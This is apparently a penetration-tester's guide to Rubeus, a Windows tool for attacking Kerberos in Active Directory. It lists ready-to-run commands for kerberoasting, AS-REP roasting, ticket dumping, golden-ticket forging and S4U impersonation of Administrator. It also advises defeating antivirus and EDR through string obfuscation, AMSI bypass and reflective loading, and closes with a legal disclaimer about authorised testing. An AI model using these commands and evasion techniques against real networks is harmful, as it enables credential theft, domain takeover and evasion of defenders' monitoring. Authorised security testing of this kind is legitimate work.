Rubeus — Install, Use, Optimise (2026)

C# tool for raw Kerberos ticket manipulation — kerberoast, AS-REP roast, ticket extraction, golden/silver tickets, S4U abuse.

Installation

Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.

Compile from source (Visual Studio)

git clone https://github.com/GhostPack/Rubeus && open in VS → Build Release

Pre-built (use cautiously)

Pre-built binaries are AV-flagged; compile yourself for engagements.

Linux equivalent

Use Impacket (GetUserSPNs, GetNPUsers, etc.) instead.

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

Kerberoast

Rubeus.exe kerberoast /outfile:kerb.txt

AS-REP roast

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Triage tickets in memory

Rubeus.exe triage

Extract a TGT

Rubeus.exe dump /service:krbtgt /luid:0x12345 /nowrap

Generate golden ticket

Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /rc4:HASH /id:500 /ptt

S4U2Self+S4U2Proxy abuse

Rubeus.exe s4u /user:WS01$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /ptt

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

• Compile with custom string obfuscation (e.g., InvisibilityCloak tool) — defeats string-based AV.
• /nowrap outputs raw base64 — easier for piping into kekeo or pyKerberos.
• /luid:0xXXXX targets specific logon session for credential extraction.
• /ptt (pass-the-ticket) injects directly into current process Memory — no .ccache file written.

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

• EVERY EDR has Rubeus signatures. Direct execution = detection. Use AMSI bypass + reflective loading.
• kerberoast requires no special privs but generates 4769 events on the DC — SOC visible.
• Golden tickets require krbtgt hash from DCSync — significant prerequisite.
• Clock skew >5min between attacker and DC = all Kerberos ops fail.

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

• Impacket (Linux-side) — same operations, different tool.
• kekeo — Benjamin Delpy’s Kerberos tool, similar capabilities.

India context and engagement notes

Rubeus is the canonical Windows-side AD attack tool in 2026. For Indian banking pen-tests, expect serious EDR (CrowdStrike, SentinelOne) — Rubeus must be obfuscated and reflectively loaded to run. Budget extra hours for tradecraft refinement.

⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.